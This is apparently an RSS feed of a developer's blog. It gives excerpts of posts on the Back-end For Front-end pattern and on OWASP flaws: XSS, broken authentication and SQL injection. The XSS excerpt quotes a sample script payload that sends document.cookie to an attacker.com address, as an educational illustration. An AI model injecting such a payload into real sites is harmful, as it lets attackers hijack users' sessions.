<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>otaviormachado.github.io</title>
    <description>A blog about lorem ipsum dolor sit amet</description>
    <link>http://otaviormachado.github.io/</link>
    <atom:link href="http://otaviormachado.github.io/feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Tue, 20 Mar 2018 02:18:21 +0000</pubDate>
    <lastBuildDate>Tue, 20 Mar 2018 02:18:21 +0000</lastBuildDate>
    <generator>Jekyll v3.6.2</generator>
    
      <item>
        <title>BFFs and when they will be your best friends.</title>
        <description>&lt;p&gt;&lt;strong&gt;tl;dr:&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;BFF stands for &lt;strong&gt;Back-end For Front-end&lt;/strong&gt;, now you can go on with your life.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;long version:&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;I can tell you straight away what exactly a BFF is and what it is used for, but I think doing some reasoning before will help you understand why it exists and when you should apply it. This is why I may be going &lt;strong&gt;way&lt;/strong&gt; back, but bear with me.&lt;/p&gt; &lt;h3 id=&quot;what-is-the-responsibility-of-the-front-end&quot;&gt;What is the responsibility of the front-end?&lt;/h3&gt; &lt;p&gt;Basically, what runs on the user’s end. A webpage, for example.&lt;/p&gt; &lt;p&gt;When you think of the front-end responsibilities, which words come to mind?&lt;/p&gt; &lt;p&gt;I am...</description>
        <pubDate>Mon, 19 Mar 2018 22:57:40 +0000</pubDate>
        <link>http://otaviormachado.github.io/bbfs-and-when-they-will-be-your-best-friends/</link>
        <guid isPermaLink="true">http://otaviormachado.github.io/bbfs-and-when-they-will-be-your-best-friends/</guid>
        
        <category>TIL</category>
        
        <category>BFFs</category>
        
        <category>Architecture</category>
        
        <category>Patterns</category>
        
        
        <category>TIL</category>
        
      </item>
    
      <item>
        <title>What are Cross-side Scripting Flaws?</title>
        <description>&lt;p&gt;This post is part of a compilation talking about the ten most common security flaws for web applications. To see them all, &lt;a href=&quot;/tags/#OWASP&quot;&gt;click here&lt;/a&gt;.&lt;/p&gt; &lt;hr /&gt; &lt;h3 id=&quot;what-are-cross-side-scripting-xss-flaws&quot;&gt;What are Cross-Side Scripting (XSS) flaws?&lt;/h3&gt; &lt;p&gt;&lt;a href=&quot;https://www.owasp.org&quot;&gt;OWASP&lt;/a&gt; defines Cross-Side Scripting (XSS) Flaws as&lt;/p&gt; &lt;blockquote&gt; &lt;p&gt;Systems that use non-trusted data written by a user without proper validation or escaping, allowing attackers to execute scripts in the victim’s browsers, hijacking user sessions, defacing web sites or redirecting the user to malicious web sites.&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;So, if your application accepts user inputs in a form such as&lt;/p&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;'&amp;lt;script&amp;gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo=' + document.cookie &amp;lt;/script&amp;gt;'...</description>
        <pubDate>Mon, 21 Mar 2016 20:43:31 +0000</pubDate>
        <link>http://otaviormachado.github.io/what-are-cross-scripting-flaws/</link>
        <guid isPermaLink="true">http://otaviormachado.github.io/what-are-cross-scripting-flaws/</guid>
        
        <category>OWASP</category>
        
        <category>Security</category>
        
        
        <category>OWASP Top10</category>
        
      </item>
    
      <item>
        <title>What is a Broken Authentication flaw?</title>
        <description>&lt;p&gt;This post is part of a compilation talking about the ten most common security flaws for web applications. To see them all, &lt;a href=&quot;/tags/#OWASP&quot;&gt;click here&lt;/a&gt;.&lt;/p&gt; &lt;hr /&gt; &lt;h3 id=&quot;what-is-a-broken-authentication-flaw&quot;&gt;What is a Broken Authentication flaw?&lt;/h3&gt; &lt;p&gt;&lt;a href=&quot;https://www.owasp.org&quot;&gt;OWASP&lt;/a&gt; defines Broken Authentication and Session Management flaws as&lt;/p&gt; &lt;blockquote&gt; &lt;p&gt;Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;So, for example, if your application supports &lt;strong&gt;URL rewriting&lt;/strong&gt;, putting session IDs in the URL, like:&lt;/p&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;...</description>
        <pubDate>Wed, 27 Jan 2016 17:46:37 +0000</pubDate>
        <link>http://otaviormachado.github.io/what-is-broken-authentication/</link>
        <guid isPermaLink="true">http://otaviormachado.github.io/what-is-broken-authentication/</guid>
        
        <category>OWASP</category>
        
        <category>Security</category>
        
        
        <category>OWASP Top10</category>
        
      </item>
    
      <item>
        <title>SQL Injection attack - Why should I care?</title>
        <description>&lt;p&gt;This post is part of a compilation talking about the ten most common security flaws for web applications. To see them all, &lt;a href=&quot;/tags/#OWASP&quot;&gt;click here&lt;/a&gt;.&lt;/p&gt; &lt;hr /&gt; &lt;h3 id=&quot;what-is-an-injection-attack&quot;&gt;What is an injection attack?&lt;/h3&gt; &lt;p&gt;&lt;a href=&quot;https://www.owasp.org&quot;&gt;OWASP&lt;/a&gt; defines the SQL Injection flaws as&lt;/p&gt; &lt;blockquote&gt; &lt;p&gt;Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;So, if your application uses untrusted data in the construction of SQL calls, like&lt;/p&gt;...</description>
        <pubDate>Wed, 27 Jan 2016 15:55:41 +0000</pubDate>
        <link>http://otaviormachado.github.io/what-is-a-sql-injection-attack-and-why-should-i-care/</link>
        <guid isPermaLink="true">http://otaviormachado.github.io/what-is-a-sql-injection-attack-and-why-should-i-care/</guid>
        
        <category>OWASP</category>
        
        <category>Security</category>
        
        
        <category>OWASP Top10</category>
        
      </item>
    
      <item>
        <title>The first one is always the useless one.</title>
        <description>&lt;p&gt;Hello, World!&lt;/p&gt; &lt;p&gt;I’m Otavio, a Software Developer from Porto Alegre, Brazil. I’ve just started my learning journey in the world of code, and I have a pile of books, articles and documentation to read.&lt;/p&gt; &lt;p&gt;When I start learning something, one of my main concerns is whether I really learned it or if in one week from now I will forget about it. Being able to write a post on a subject I’m starting to understand will help me not only learn in more detail, but also have a place where I can resume what I have understood and discuss with...</description>
        <pubDate>Sat, 19 Sep 2015 02:16:56 +0000</pubDate>
        <link>http://otaviormachado.github.io/the-first-one-is-always-the-useless-one/</link>
        <guid isPermaLink="true">http://otaviormachado.github.io/the-first-one-is-always-the-useless-one/</guid>
        
        <category>Introduction</category>
        
        
        <category>Not Code Related</category>
        
      </item>
    
  </channel>
</rss>
